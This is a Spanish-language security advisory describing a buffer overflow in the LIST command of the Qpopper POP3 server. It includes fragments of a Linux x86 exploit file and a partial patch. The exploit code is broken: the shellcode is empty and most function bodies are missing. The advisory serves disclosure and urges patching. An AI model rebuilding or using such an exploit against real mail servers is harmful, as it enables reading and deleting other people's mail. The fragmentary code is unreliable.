Programa: Qpopper <= 3.0beta29 (2.53 y anteriores no
son vulnerables)
- Problema: El, hoy en día, tan común servidor pop3 qpop es uno de los mejores servidores que implementa muchas funciones añadidas que un servidor pop3 normal. Como casi todo software, desgraciadamente, tiene fallos de seguridad. En este caso una vez pasada la etapa de autentificacion se puede conseguir la ejecución de código debido a la existencia de un buffer overflow. Mediante este buffer overflow (segundo argumento
del comando LIST) podemos ejecutar código bajo el uid del usuario
con el que superamos la etapa de autentificacion, y con gid mail. Al tener
gid mail en algunos sistemas podemos leer el correo de cualquier persona
e incluso borrarlo.
- Exploit: Como prueba de la vulnerabilidad liberamos el xploit para Linux x86. Pero cuidado, que no exista xploit publico para tu sistema no significa que no te puedan entrar. La vulnerabilidad existe, parcheala! ------- qpop-xploit.c ---------- /*
#include <stdio.h> #define BUFFERSIZE 1004
char shellcode[]=
void usage(char *progname) {
int main(int argc, char **argv) {
fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
if (argc<3) usage(argv[0]); if (argc==4) offset+=atol(argv[3]); ptr=buffer;
fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
printf("USER %s\n",argv[1]);
return(0);
------- qpop-xploit.c ---------
- Fix: La mejor solución es esperar a una nueva versión parcheada, pero si urge mucho aquí tenéis un parche que parara este ataque (cuidado este parche no fue hecho tras una revisión total del código, puede que existan mas overflows). ------ pop_list.patch --------- 77c77
------ pop_list.patch --------- piscis:~# patch pop_list.c pop_list.patch
Spain r0x Saludos :) Zhodiac
Para ver el web en las mejores condiciones, usa una resolución de 800x600 y Netscape Navigator |